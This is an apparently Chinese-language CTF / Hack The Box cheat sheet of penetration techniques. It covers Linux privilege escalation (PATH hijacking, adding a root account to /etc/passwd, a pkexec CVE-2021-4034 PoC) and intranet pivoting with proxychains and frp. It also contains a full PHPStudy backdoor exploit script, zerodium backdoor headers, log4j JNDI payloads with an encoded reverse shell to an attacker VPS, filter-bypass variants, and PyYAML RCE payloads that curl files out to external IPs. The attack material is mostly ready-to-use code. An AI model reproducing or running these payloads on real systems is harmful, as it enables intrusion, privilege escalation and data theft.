渗透(Hack The Box / HTB)
扫描
nmap
nmap -sC -sV xx.xx.xx.xx -oA src/-sCis for using default nmap scripts,-sVfor enumerating services versions,-oAis for output ALL format and specify the directorysrc,NOTICE: you may be adding
-Pnif you have an error wait for some time and here is the result.
提权
参考:GTFOBins
SUID提权(4000权限)
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。
发现系统上运行的所有SUID可执行文件,不同系统适用于不同的命令:
1 | find / -perm -u=s -type f 2>/dev/null |
环境变量提权
1
2
3
4
5
6
7
8
9#/home/raj/script/shell具SUID权限
cd /tmp
echo “/bin/bash” > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoamifind 提权
1
2
3# 普通用户,进入到/tmp目录下,然后新建一个文件
touch abcd
find abcd -exec whoami \;/etc/shadow 提权
1
xxd "/etc/shadow" | xxd -r
/etc/passwd 提权
1
2
3
4
5cat /etc/passwd>passwd
echo "test:abRcsZmlrrKFA:0:0:,,,:/root:/bin/bash" >>passwd
cp passwd /etc/passwd
python3 -c 'import pty; pty.spawn("/bin/bash")'
su - test
nl 提权
nl /flagdate 提权
/usr/bin/date -f /flag(利用date命令的 -f 参数读取文件)
curl 提取
curl file:///flag以其他用户运行命令
sudo -l(查看此用户拥有的特殊权限,如NOPASSWD)echo password | su -c userB cat xxx.txt根目录非root权限
ls -al /(检查根目录权限是否非root)1
2
3
4
5
6mv bin bin1
/bin1/mkdir bin
/bin1/chmod 777 bin
/bin1/echo "/bin1/cat /flag" > /bin/umount
/bin1/chmod 777 /bin/umount
exit
pkexec提权漏洞
/usr/lib/policykit-1/polkit-agent-helper-1https://github.com/arthepsy/CVE-2021-4034
1
2chmod +x ./pkexec_poc
./pkexec_poc
非常规读文件
1 | /lib/gcc/x86_64-linux-gnu/[id]/cc1 /etc/passwd -o /dev/null |
内网穿透
探测内网主机
1
for k in $( seq 1 255);do ping -c 1 10.203.113.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
常见端口扫描
EW代理:
./ew_for_linux64 -s ssocksd -l 9999扫描:
proxychains3 nmap 扫描常见端口操作
远程连接数据库:
proxychains3 mysql -h 10.203.113.33 -u ctf -p启动火狐浏览器:
proxychains3 firefox远程连接:
proxychains3 rdesktop 10.203.113.34:3389
frp
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
项目地址 https://github.com/fatedier/frp/blob/master/README_zh.md
目录文件:
1 | frpc 客户端可执行程序 |
服务端配置( frps.ini 文件)
1 | [common] |
启动: ./frps -c frps.ini
客户端配置( frpc.ini 文件)
1 | [common] |
启动: ./frpc -c frpc.ini
其他
PHPStudy 后门漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104import requests
import base64
from random import choice
USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
TIME_OUT=10
print(r"""
_____ _ _ _____ _____ _ _ ____ _ _
| __ \ | | | || __ \ / ____|| | | | | _ \ | | | |
| |__) || |__| || |__) || (___ | |_ _ _ __| | _ _ | |_) | __ _ ___ | | __ __| | ___ ___ _ __
| ___/ | __ || ___/ \___ \ | __|| | | | / _` || | | | | _ < / _` | / __|| |/ // _` | / _ \ / _ \ | '__|
| | | | | || | ____) || |_ | |_| || (_| || |_| | | |_) || (_| || (__ | <| (_| || (_) || (_) || |
|_| |_| |_||_| |_____/ \__| \__,_| \__,_| \__, | |____/ \__,_| \___||_|\_\\__,_| \___/ \___/ |_|
__/ |
|___/
Usage & e.g. :
Target Url:
localhost/flag.php
Input Your Command:
phpinfo();
Notice: Command Must Be PHP Function, If You Want To Execute OS Command, Use: system('YOUR COMMAND');
By:Sp4ce
Have Fun
""")
def checkTarget(url):
poc = {
"Accept-Charset": "cGhwaW5mbygpOw==",
"Accept-Encoding": "gzip,deflate"
}
try:
pocRequest = requests.get(url, headers=poc,timeout=TIME_OUT)
if "phpinfo" in str(pocRequest.content):
print('[+] Target is vulnerable.')
return True
else:
print('[-] Target is NOT vulnerable.')
return False
except :
print('[-] Looks Like Something Wrong.')
def exploit(url,command):
headers = {}
headers['User-Agent'] = choice(USER_AGENTS)
headers['Accept-Encoding'] = 'gzip,deflate'
headers['Accept-Charset'] = command
try:
request = requests.get(url, headers=headers)
if request.status_code == 200:
print('[+] Command Execute Successful.')
print(request.text)
else:
print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
except:
print('[-] Looks Like Something Wrong.\n')
if __name__ == "__main__":
while True:
url = input("Target Url:\n")
if 'http' not in url:
url = "http://" + url
print('[i] Checking Target...')
if checkTarget(url):
cmd = input("Input Your Command:\n")
command = base64.b64encode(cmd.encode('utf-8'))
exploit(url,command)zerodium 后门
列目录:
User-Agentt: zerodiumsystem('ls /');读文件:
User-Agentt: zerodiumsystem('cat /flag');log4j2 漏洞(CVE-2021-44228)
步骤:
在vps上通过 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 启动监听
1
2
3java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny54eHgueHh4LjIyMC8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}" -A "47.xxx.xxx.220"
# YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny54eHgueHh4LjIyMC8yMzMzIDA+JjE= 为 bash -i >& /dev/tcp/47.xxx.xxx.220/2333 0>&1, 用于反弹shell将payload填入找到的漏洞处
1
${jndi:ldap:${sys:file.separator}${sys:file.separator}47.xxx.xxx.220:1389${sys:file.separator}ge5udq}
绕过:
1
2
3
4
5
6
7
8${jndi:ladp://xxxxxx.dnslog.cn/exp}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxxxxx.dnslog.cn/exp}
${${::-j}ndi:rmi://xxxxxx.dnslog.cn/exp}
${jndi:rmi://xxxxxx.dnslog.cn}
${${lower:jndi}:${lower:rmi}://xxxxxx.dnslog.cn/exp}
${${lower:${lower:jndi}}:${lower:rmi}://xxxxxx.dnslog.cn/exp}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxxxxx.dnslog.cn/exp}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxx.dnslog.cn/exp}PyYAML漏洞(CVE-2020-1747)
版本:5.3
1
2
3
4
5
6
7
8
9# pyyaml==5.3 required. Vulnerability has been fixed in 5.3.1
# More: ret2libc's report in https://github.com/yaml/pyyaml/pull/386
# Explanation: https://2130706433.net/blog/pyyaml/
from yaml import *
with open('payload.yaml','rb') as f:
content = f.read()
data = load(content, Loader=FullLoader) # Using vulnerable FullLoaderRCE:
1
2
3
4
5
6
7
8
9
10# payload.yaml
# The `extend` function is overriden to run `yaml.unsafe_load` with
# custom `listitems` argument, in this case a simple curl request
- !!python/object/new:yaml.MappingNode
listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "http://127.0.0.1/rce"]]'
state:
tag: !!str dummy
value: !!str dummy
extend: !!python/name:yaml.unsafe_load1
2
3!!python/object/new:tuple [!!python/object/new:map [!!python/name:eval ,
["\x5f\x5fimport\x5f\x5f('os')\x2esystem('curl http://xxx.xxx.xxx.xxx:1234 -d
@/flag')"]]]1
2
3!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('curl -d @/flag http://111.111.111.111:8082')"参考:
